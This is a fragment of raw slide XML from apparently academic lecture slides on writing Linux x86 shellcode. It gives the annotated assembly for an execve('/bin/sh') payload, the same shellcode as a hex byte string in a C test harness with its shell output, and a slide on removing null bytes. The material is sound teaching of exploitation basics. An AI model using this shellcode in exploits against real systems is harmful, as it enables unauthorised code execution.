                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543766" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943601" y="2514600"/>
            <a:ext cx="2557912" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>str_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543767" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="2000250"/>
            <a:ext cx="685800" cy="5715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Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20587389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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 2ah            		# 2 bytes jumps 42 bytes forward to the call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>instr</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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>            		# 1 byte  saves “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>” address in ESI</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[esi+7],0 			# 4 bytes puts the ‘\0’ after “/bin/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mov [esi+8],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 		# 3 bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>” after “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\0”        </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[esi+0ch],0 		# 7 bytes puts a zero word after “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\0addr”</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eax,0bh      		# 5 bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> index for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> in EAX</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebx,esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      		# 2 bytes puts the address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\0” in EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>,[esi+8] 		# 3 bytes puts the address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> in ECX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esi+ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>] 		# 3 bytes puts the address NULL pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) in EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 80h          		# 2 bytes calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a: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eax,1h 	     	# 5 bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> index for exit in EAX</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ebx,0h	     	# 5 bytes return value in EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 80h          		# 2 bytes calls exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>call -2fh         		# 5 bytes (-47 bytes back)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>.string \"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\“  	# 8 bytes /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9093133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Testing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3”;</a:t>
            </a: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(*shell)();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</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vigna@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>~: ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>testsc</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bash$ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16498565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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fixing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546821" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is usually copied into a string buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any null byte in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> would stop the copying procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Null bytes must be eliminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [esi+7],0 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [esi+0ch],0 become </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax,eax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mov [esi+7], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [esi+0ch], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0bh, becomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  al, 0bh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 1 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0 become</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
